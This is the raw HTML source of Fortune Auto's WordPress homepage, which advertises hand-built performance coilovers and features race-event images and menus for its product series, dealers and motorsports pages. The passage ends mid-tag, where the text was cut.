<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <title>Fortune Auto - Performance Coilovers - Hand-Built in the USA</title> <meta name="description" content="Coilover Suspension - Higher Performance by Design. Race-Proven Performance on the Street or the Track. Fortune Auto Bespoke Coilovers. #HANDBUILT4ME" /> <link rel="canonical" href="https://fortune-auto.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Fortune Auto - Performance Coilovers - Hand-Built in the USA" /> <meta property="og:description" content="Coilover Suspension - Higher Performance by Design. Race-Proven Performance on the Street or the Track. Fortune Auto Bespoke Coilovers. #HANDBUILT4ME" /> <meta property="og:url" content="https://fortune-auto.com/" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Coilover Suspension - Higher Performance by Design. Race-Proven Performance on the Street or the Track. Fortune Auto Bespoke Coilovers. #HANDBUILT4ME" /> <meta name="twitter:title" content="Fortune Auto - Performance Coilovers - Hand-Built in the USA" /> <meta name="twitter:image" content="https://fortune-auto.com/wp-content/uploads/2019/01/home.jpg" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://fortune-auto.com/#website","url":"https://fortune-auto.com/","name":"Fortune Auto Coilovers","potentialAction":{"@type":"SearchAction","target":"https://fortune-auto.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://fortune-auto.com/","sameAs":["https://www.facebook.com/FortuneAuto/","http://fortuneautousa","https://www.youtube.com/channel/UCu_6CszSIMyssYoyT-dUn9g"],"@id":"https://fortune-auto.com/#organization","name":"Fortune Auto","logo":""}</script> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="https://fortune-auto.com/feed/" /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://fortune-auto.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/fortune-auto.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='themify-common-css' href='https://fortune-auto.com/wp-content/themes/themify-music/themify/css/themify.common.min.css?ver=5.1.1' type='text/css' media='all' /> <meta name="themify-framework-css" content="themify-framework-css" id="themify-framework-css"> <meta name="builder-styles-css" content="builder-styles-css" id="builder-styles-css"> <link rel='stylesheet' id='wp-block-library-css' href='https://fortune-auto.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-ui-css' href='https://fortune-auto.com/wp-content/plugins/form-maker/css/jquery-ui-1.10.3.custom.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-ui-spinner-css' href='https://fortune-auto.com/wp-content/plugins/form-maker/css/jquery-ui-spinner.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='form_maker_calendar-jos-css' href='https://fortune-auto.com/wp-content/plugins/form-maker/css/calendar-jos.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='form_maker_frontend-css' href='https://fortune-auto.com/wp-content/plugins/form-maker/css/form_maker_frontend.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='style_submissions-css' href='https://fortune-auto.com/wp-content/plugins/form-maker/css/style_submissions.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-responsive-tables-css' href='https://fortune-auto.com/wp-content/plugins/tablepress-responsive-tables/css/responsive.dataTables.min.css?ver=1.5' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-default-css' href='https://fortune-auto.com/wp-content/tablepress-combined.min.css?ver=32' type='text/css' media='all' /> <link rel='stylesheet' id='theme-style-css' href='https://fortune-auto.com/wp-content/themes/themify-music/style.min.css?ver=1.9.4' type='text/css' media='all' /> <link rel='stylesheet' id='themify-media-queries-css' href='https://fortune-auto.com/wp-content/themes/themify-music/media-queries.min.css?ver=1.9.4' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://fortune-auto.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://fortune-auto.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='themify-builder-2256-generated-css' href='https://fortune-auto.com/wp-content/uploads/themify-css/themify-builder-2256-generated.css?ver=1557870827' type='text/css' media='all' /> <link rel='stylesheet' id='themify-customize-css' href='https://fortune-auto.com/wp-content/uploads/themify-customizer.css?ver=19.03.04.20.34.20' type='text/css' media='all' /> <link rel='stylesheet' id='themify-google-fonts-css' href='https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C700%2C900%7COpen+Sans%3Anormal%2C300%7COpen+Sans%3Anormal%2C300%7COpen+Sans%3Anormal%2C300%7COpen+Sans%3Anormal%2C300%7COpen+Sans%3Anormal%2C300%7COpen+Sans%3Anormal%2C300&#038;subset=latin&#038;ver=5.1.1' type='text/css' media='all' /> <!--[if !IE]><!--> <link rel='stylesheet' id='tablepress-responsive-tables-flip-css' href='https://fortune-auto.com/wp-content/plugins/tablepress-responsive-tables/css/tablepress-responsive-flip.min.css?ver=1.5' type='text/css' media='all' /> <!--<![endif]--> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-content/plugins/form-maker/js/if_gmap_front_end.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-content/plugins/form-maker/js/jelly.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-content/plugins/form-maker/js/file-upload.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-content/plugins/form-maker/js/calendar/calendar.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-content/plugins/form-maker/js/calendar/calendar_function.js?ver=5.1.1'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <link rel='https://api.w.org/' href='https://fortune-auto.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://fortune-auto.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://fortune-auto.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://fortune-auto.com/' /> <link rel="alternate" type="application/json+oembed" href="https://fortune-auto.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffortune-auto.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://fortune-auto.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffortune-auto.com%2F&#038;format=xml" /> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1818969004789881'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1818969004789881&ev=PageView&noscript=1" /></noscript> <link href="https://fortune-auto.com/wp-content/uploads/2019/03/favicon.jpg" rel="shortcut icon" /> <script type="text/javascript"> var tf_mobile_menu_trigger_point = 600; </script> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body class="home page-template-default page page-id-2256 page-parent themify-fw-4-2-4 themify-music-1-9-4 skin-default not-ie full_width sidebar-none no-touch themify_lightboxed_images has-fixed-header transparent-header builder-parallax-scrolling-active header-horizontal fixed-header rss-off search-off"> <script type="text/javascript"> function themifyMobileMenuTrigger(e) { if( document.body.clientWidth > 0 && document.body.clientWidth <= tf_mobile_menu_trigger_point ) { document.body.classList.add( 'mobile_menu_active' ); } else { document.body.classList.remove( 'mobile_menu_active' ); } } themifyMobileMenuTrigger(); document.addEventListener( 'DOMContentLoaded', function () { jQuery( window ).on('tfsmartresize.tf_mobile_menu', themifyMobileMenuTrigger ); }, false ); </script> <div id="pagewrap" class="hfeed site"> <div id="headerwrap"> <header id="header" class="pagewidth clearfix" itemscope="itemscope" itemtype="https://schema.org/WPHeader"> <div class="header-bar"> <div id="site-logo"><a href="https://www.fortune-auto.com/" title=""><img src="https://fortune-auto.com/wp-content/uploads/2019/03/FALogo.png" alt="" title="" /></a></div> <div id="site-description" class="site-description"><span>Fortune Auto</span></div> </div> <a id="menu-icon" href="#"><span class="menu-icon-inner"></span></a> <div id="mobile-menu" class="sidemenu sidemenu-off"> <div class="navbar-wrapper clearfix"> <div class="social-widget"> <div id="themify-social-links-1005" class="widget themify-social-links"><ul class="social-links horizontal"> <li class="social-link-item facebook font-icon icon-medium"> <a href="https://www.facebook.com/FortuneAuto"><i class="fa fa-facebook" style="color: #ffffff;"></i> </a> </li> <li class="social-link-item instagram font-icon icon-medium"> <a href="https://www.instagram.com/fortuneautousa/"><i class="fa fa-instagram" style="color: #ffffff;"></i> </a> </li> <li class="social-link-item youtube font-icon icon-medium"> <a href="https://www.youtube.com/channel/UCu_6CszSIMyssYoyT-dUn9g"><i class="fa fa-youtube" style="color: #ffffff;"></i> </a> </li> </ul></div> </div> <nav id="main-nav-wrap" class="clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <ul id="main-nav" class="main-nav menu-name-main-nav"><li id="menu-item-4604" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children has-sub-menu menu-item-4604"><a>Coilovers</a> <ul class="sub-menu"> <li id="menu-item-12524" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12524"><a href="https://fortune-auto.com/coilovers/500series/">500 Series</a></li> <li id="menu-item-12523" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12523"><a href="https://fortune-auto.com/coilovers/510series/">510 Series</a></li> <li id="menu-item-12522" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12522"><a href="https://fortune-auto.com/coilovers/dreadnoughtpro2way/">PRO 2-Way</a></li> <li id="menu-item-12521" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12521"><a href="https://fortune-auto.com/coilovers/dreadnoughtpro3way/">PRO 3-Way</a></li> <li id="menu-item-4599" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4599"><a href="https://fortune-auto.com/coilovers/mullermsc1way/">Muller MSC 1-Way</a></li> <li id="menu-item-4598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4598"><a href="https://fortune-auto.com/coilovers/airpistonliftsystem/">Air Piston Lift System</a></li> <li id="menu-item-4597" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4597"><a href="https://fortune-auto.com/coilovers/remotedampercontroller/">Remote Damper Controller</a></li> </ul> </li> <li id="menu-item-4595" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4595"><a href="https://fortune-auto.com/service/">Service</a></li> <li id="menu-item-5737" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children has-sub-menu menu-item-5737"><a>Motorsports</a> <ul class="sub-menu"> <li id="menu-item-5434" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5434"><a href="https://fortune-auto.com/technology/">Technology</a></li> <li id="menu-item-5786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5786"><a href="https://fortune-auto.com/drivers/">Drivers</a></li> <li id="menu-item-5784" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5784"><a href="https://fortune-auto.com/sponsorship/">Sponsorship</a></li> </ul> </li> <li id="menu-item-5341" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children has-sub-menu menu-item-5341"><a>Dealers</a> <ul class="sub-menu"> <li id="menu-item-9870" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9870"><a href="https://fortune-auto.com/dealers">Dealer List</a></li> <li id="menu-item-6170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6170"><a href="https://fortune-auto.com/wp-content/uploads/2017/12/Dealer-Agreement-1.pdf">Become a Dealer</a></li> <li id="menu-item-9855" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9855"><a href="https://fortune-auto.com/wp-content/uploads/2017/12/Dealer-Policy-Revised.pdf">MAP Policy</a></li> <li id="menu-item-5340" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5340"><a href="https://fortune-auto.com/vendor-portal/">Vendor Portal</a></li> </ul> </li> <li id="menu-item-5163" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children has-sub-menu menu-item-5163"><a href="/about">About</a> <ul class="sub-menu"> <li id="menu-item-4594" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4594"><a href="https://fortune-auto.com/about/">About</a></li> <li id="menu-item-5162" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5162"><a href="https://fortune-auto.com/contact/">Contact</a></li> <li id="menu-item-5161" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5161"><a href="https://fortune-auto.com/terms-and-conditions/">Terms and Conditions</a></li> </ul> </li> <li id="menu-item-5739" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5739"><a target="_blank" href="http://www.shop-fortune-auto.com/">Shop</a></li> </ul> </nav> </div> <a id="menu-icon-close" href="#mobile-menu"></a> </div> </header> </div> <div id="body" class="clearfix"> <div id="layout" class="pagewidth clearfix"> <div id="content" class="clearfix"> <div id="page-2256" class="type-page"> <div class="page-content entry-content"> <script type="text/javascript"> if(!document.getElementById( "builder-styles" ) && document.getElementById( "builder-styles-css" ) ) document.getElementById( "builder-styles-css" ).insertAdjacentHTML( "beforebegin", "<link id='builder-styles' rel='stylesheet' href='https://fortune-auto.com/wp-content/themes/themify-music/themify/themify-builder/css/themify-builder-style.min.css?ver=4.2.4' type='text/css' />" ); </script><p></p> <div id="themify_builder_content-2256" data-postid="2256" class="themify_builder_content themify_builder_content-2256 themify_builder"> <div data-fullwidthvideo="https://fortune-auto.com/wp-content/uploads/2014/03/0-7.mp4" class="themify_builder_row module_row clearfix handbuilt fullcover fullheight module_row_0 themify_builder_2256_row module_row_2256-0 hide-tablet hide-mobile" data-id="b69a699"> <div class="builder_row_cover "></div> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-0-0" data-id="31e3daa"> <div class="tb-column-inner"> <div id="text-2256-0-0-0" class="module module-text text-2256-0-0-0 repeat " data-id="432cfea"> <h2 style="text-align: center;"><strong>GENERATION 7<br /></strong></h2><h3 style="text-align: center;">Our most advanced Generation yet.</h3><p style="text-align: center;"> </p> </div> <div id="buttons-2256-0-0-1" class="module module-buttons buttons-2256-0-0-1 wow fadeIn" data-id="4396c97"> <div class="module-buttons xlarge outline circle"> <div class="module-buttons-item buttons-horizontal"> <a href="https://www.youtube.com/watch?v=Kmil8ExxRC0" class="ui builder_button themify_lightbox"><i class="fa fa-play-circle"></i> <span>EXPLORE</span></a> </div> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix fullwidth module_row_1 themify_builder_2256_row module_row_2256-1" data-id="e69a864"> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-1-0" data-id="e0e0885"> <div class="tb-column-inner"> <div id="image-2256-1-0-0" class="module module-image image-2256-1-0-0 image-top hide-desktop" data-id="98d0baa"> <div class="image-wrap"> <a href="https://fortune-auto.com/coilovers/500series/"> <img src="https://fortune-auto.com/wp-content/uploads/2019/01/home.jpg" class=" wp-post-image wp-image-12721" alt="home" srcset="https://fortune-auto.com/wp-content/uploads/2019/01/home.jpg 1200w, https://fortune-auto.com/wp-content/uploads/2019/01/home-225x300.jpg 225w, https://fortune-auto.com/wp-content/uploads/2019/01/home-768x1024.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" /> </a> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix repeat fullwidth module_row_2 themify_builder_2256_row module_row_2256-2" data-id="6e1206b"> <div class="builder_row_cover "></div> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-2-0" data-id="95b1e23"> <div class="tb-column-inner"> <div id="image-2256-2-0-0" class="module module-image image-2256-2-0-0 image-top auto_fullwidth" data-id="904bd24"> <div class="image-wrap"> <img src="https://fortune-auto.com/wp-content/uploads/2019/05/gta2019roadatlanta.jpg" class=" wp-post-image wp-image-12973" alt="gta2019roadatlanta" srcset="https://fortune-auto.com/wp-content/uploads/2019/05/gta2019roadatlanta.jpg 3000w, https://fortune-auto.com/wp-content/uploads/2019/05/gta2019roadatlanta-300x112.jpg 300w, https://fortune-auto.com/wp-content/uploads/2019/05/gta2019roadatlanta-768x287.jpg 768w, https://fortune-auto.com/wp-content/uploads/2019/05/gta2019roadatlanta-1024x383.jpg 1024w" sizes="(max-width: 3000px) 100vw, 3000px" /> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix repeat fullwidth module_row_3 themify_builder_2256_row module_row_2256-3" data-id="6e1206b"> <div class="builder_row_cover "></div> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-3-0" data-id="95b1e23"> <div class="tb-column-inner"> <div id="image-2256-3-0-0" class="module module-image image-2256-3-0-0 image-top auto_fullwidth" data-id="904bd24"> <div class="image-wrap"> <img src="https://fortune-auto.com/wp-content/uploads/2019/02/attacktsukuba2019.jpg" class=" wp-post-image wp-image-12795" alt="attacktsukuba2019" srcset="https://fortune-auto.com/wp-content/uploads/2019/02/attacktsukuba2019.jpg 3000w, https://fortune-auto.com/wp-content/uploads/2019/02/attacktsukuba2019-300x125.jpg 300w, https://fortune-auto.com/wp-content/uploads/2019/02/attacktsukuba2019-768x320.jpg 768w, https://fortune-auto.com/wp-content/uploads/2019/02/attacktsukuba2019-1024x427.jpg 1024w" sizes="(max-width: 3000px) 100vw, 3000px" /> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix builder-parallax-scrolling fullwidth module_row_4 themify_builder_2256_row module_row_2256-4" data-id="66084a6"> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-4-0" data-id="33cf078"> <div class="tb-column-inner"> <div id="image-2256-4-0-0" class="module module-image image-2256-4-0-0 image-top wow fadeIn auto_fullwidth" data-id="3ada7f1"> <div class="image-wrap"> <a href="https://fortune-auto.com/dirk-stratton" rel="noopener" target="_blank"> <img src="https://fortune-auto.com/wp-content/uploads/2018/12/dirkroty.jpg" class=" wp-post-image wp-image-12153" alt="dirkroty" srcset="https://fortune-auto.com/wp-content/uploads/2018/12/dirkroty.jpg 3000w, https://fortune-auto.com/wp-content/uploads/2018/12/dirkroty-300x83.jpg 300w, https://fortune-auto.com/wp-content/uploads/2018/12/dirkroty-768x213.jpg 768w, https://fortune-auto.com/wp-content/uploads/2018/12/dirkroty-1024x284.jpg 1024w" sizes="(max-width: 3000px) 100vw, 3000px" /> </a> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix repeat fullwidth_row_container module_row_5 themify_builder_2256_row module_row_2256-5 hide-tablet hide-mobile" data-id="1e93612"> <div class="builder_row_cover tb-row-cover-hover"></div> <div class="row_inner col_align_top gutter-none"> <div class="module_column tb-column col4-1 first tb_2256_column module_column_0 module_column_2256-5-0" data-id="14ca61b"> <div class="tb-column-inner"> <div id="divider-2256-5-0-0" class="module module-divider divider-2256-5-0-0 solid hide-tablet hide-mobile" data-id="a303b22" style="border-width: 40px;border-color: rgba(0,0,0, 0);"> </div> <div id="image-2256-5-0-1" class="module module-image image-2256-5-0-1 image-top hide-mobile auto_fullwidth" data-id="654fd27"> <div class="image-wrap"> <a href="/gridlifesouth2018"> <img src="https://fortune-auto.com/wp-content/uploads/2018/10/gridlifesouth2018-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-11328" alt="gridlifesouth2018" srcset="https://fortune-auto.com/wp-content/uploads/2018/10/gridlifesouth2018.jpg 600w, https://fortune-auto.com/wp-content/uploads/2018/10/gridlifesouth2018-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2018/10/gridlifesouth2018-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> <div id="image-2256-5-0-2" class="module module-image image-2256-5-0-2 image-top hide-mobile auto_fullwidth" data-id="564ef2e"> <div class="image-wrap"> <a href="/dirk-stratton"> <img src="https://fortune-auto.com/wp-content/uploads/2018/10/dirk-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-11330" alt="dirk" srcset="https://fortune-auto.com/wp-content/uploads/2018/10/dirk.jpg 600w, https://fortune-auto.com/wp-content/uploads/2018/10/dirk-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2018/10/dirk-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> </div> </div> <div class="module_column tb-column col4-1 second tb_2256_column module_column_1 module_column_2256-5-1" data-id="afa1ca4"> <div class="tb-column-inner"> <div id="divider-2256-5-1-0" class="module module-divider divider-2256-5-1-0 solid " data-id="87c611b" style="border-width: 40px;border-color: rgba(0,0,0, 0.00);"> </div> <div id="image-2256-5-1-1" class="module module-image image-2256-5-1-1 image-top hide-mobile auto_fullwidth" data-id="a1e42b1"> <div class="image-wrap"> <a href="https://www.youtube.com/watch?v=1Ne9L6zFqio" rel="noopener" target="_blank"> <img src="https://fortune-auto.com/wp-content/uploads/2014/03/SpeedAcademy1-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-8579" alt="SpeedAcademy1" srcset="https://fortune-auto.com/wp-content/uploads/2014/03/SpeedAcademy1.jpg 600w, https://fortune-auto.com/wp-content/uploads/2014/03/SpeedAcademy1-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2014/03/SpeedAcademy1-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> <div id="image-2256-5-1-2" class="module module-image image-2256-5-1-2 image-top hide-mobile auto_fullwidth" data-id="f8f4c16"> <div class="image-wrap"> <a href="https://www.instagram.com/fortuneautousa/" rel="noopener" target="_blank"> <img src="https://fortune-auto.com/wp-content/uploads/2014/03/ig-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-4097" alt="ig" srcset="https://fortune-auto.com/wp-content/uploads/2014/03/ig.jpg 600w, https://fortune-auto.com/wp-content/uploads/2014/03/ig-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2014/03/ig-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> <div id="divider-2256-5-1-3" class="module module-divider divider-2256-5-1-3 solid " data-id="dd36f10" style="border-width: 40px;border-color: rgba(0,0,0, 0.00);"> </div> </div> </div> <div class="module_column tb-column col4-1 third tb_2256_column module_column_2 module_column_2256-5-2" data-id="6e3b245"> <div class="tb-column-inner"> <div id="divider-2256-5-2-0" class="module module-divider divider-2256-5-2-0 solid hide-tablet hide-mobile" data-id="05427e3" style="border-width: 40px;border-color: rgba(0,0,0, 0);"> </div> <div id="image-2256-5-2-1" class="module module-image image-2256-5-2-1 image-top auto_fullwidth" data-id="c3d50b7"> <div class="image-wrap"> <a href="/formula-drift-irwindale-2018"> <img src="https://fortune-auto.com/wp-content/uploads/2018/10/FDIrwindale-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-11178" alt="FDIrwindale" srcset="https://fortune-auto.com/wp-content/uploads/2018/10/FDIrwindale.jpg 600w, https://fortune-auto.com/wp-content/uploads/2018/10/FDIrwindale-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2018/10/FDIrwindale-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> <div 